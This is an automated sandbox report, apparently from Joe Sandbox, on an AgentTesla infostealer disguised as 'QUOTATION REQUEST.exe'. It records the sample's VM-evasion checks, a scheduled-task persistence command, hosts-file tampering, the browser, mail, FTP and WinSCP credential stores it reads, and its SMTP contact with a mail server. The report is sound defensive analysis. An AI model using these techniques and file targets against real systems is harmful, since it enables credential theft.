              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: QUOTATION REQUEST.exe PID: 5388, type: MEMORY
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 623
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 1112Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 5400Thread sleep time: -41500s >= -30000s
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 6140Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe TID: 5736Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe TID: 5172Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: RegSvcs.exe, 00000003.00000002.467684080.00000000063B0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllurrentControlSet\Control\ProductOptions|ProductSuiteOSType
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212705548.0000000002E3E000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: RegSvcs.exe, 00000003.00000002.467751584.00000000064B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Modifies the hosts fileShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
              Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: RegSvcs.exe, 00000003.00000002.463897257.0000000001D80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeQueries volume information: C:\Users\user\Desktop\QUOTATION REQUEST.exe VolumeInformation
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings:

              barindex
              Modifies the hosts fileShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: QUOTATION REQUEST.exe PID: 5388, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1564, type: MEMORY
              Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1564, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: QUOTATION REQUEST.exe PID: 5388, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1564, type: MEMORY
              Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection12File and Directory Permissions Modification1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/Job1Registry Run Keys / Startup Folder1Scheduled Task/Job1Disable or Modify Tools1Input Capture1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information2Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSSecurity Software Discovery321Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion14Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 321450 Sample: QUOTATION   REQUEST.exe Startdate: 22/11/2020 Architecture: WINDOWS Score: 100 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for dropped file 2->51 53 10 other signatures 2->53 7 QUOTATION   REQUEST.exe 6 2->7         started        10 lEmohP.exe 2 2->10         started        12 lEmohP.exe 1 2->12         started        process3 file4 27 C:\Users\user\AppData\...behaviorgraphtVSibeZGs.exe, PE32 7->27 dropped 29 C:\Users\user\AppData\Local\Temp\tmpCA2.tmp, XML 7->29 dropped 31 C:\Users\user\...\QUOTATION   REQUEST.exe.log, ASCII 7->31 dropped 14 RegSvcs.exe 2 4 7->14         started        19 schtasks.exe 1 7->19         started        21 conhost.exe 10->21         started        23 conhost.exe 12->23         started        process5 dnsIp6 37 mail.hemetek.com 107.6.134.138, 49738, 587 SINGLEHOP-LLCUS United States 14->37 33 C:\Users\user\AppData\Roaming\...\lEmohP.exe, PE32 14->33 dropped 35 C:\Windows\System32\drivers\etc\hosts, ASCII 14->35 dropped 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->39 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->41 43 Tries to steal Mail credentials (via file access) 14->43 45 5 other signatures 14->45 25 conhost.exe 19->25         started        file7 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              QUOTATION REQUEST.exe53%VirustotalBrowse
              QUOTATION REQUEST.exe52%ReversingLabsByteCode-MSIL.Infostealer.Stelega
              QUOTATION REQUEST.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\GtVSibeZGs.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\GtVSibeZGs.exe52%ReversingLabsByteCode-MSIL.Infostealer.Stelega
              C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe0%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe0%ReversingLabs

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              3.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

              Domains

              SourceDetectionScannerLabelLink
              mail.hemetek.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://C0BJotQhI3.net0%Avira URL Cloudsafe
              http://TDhznh.com0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              http://mail.hemetek.com0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
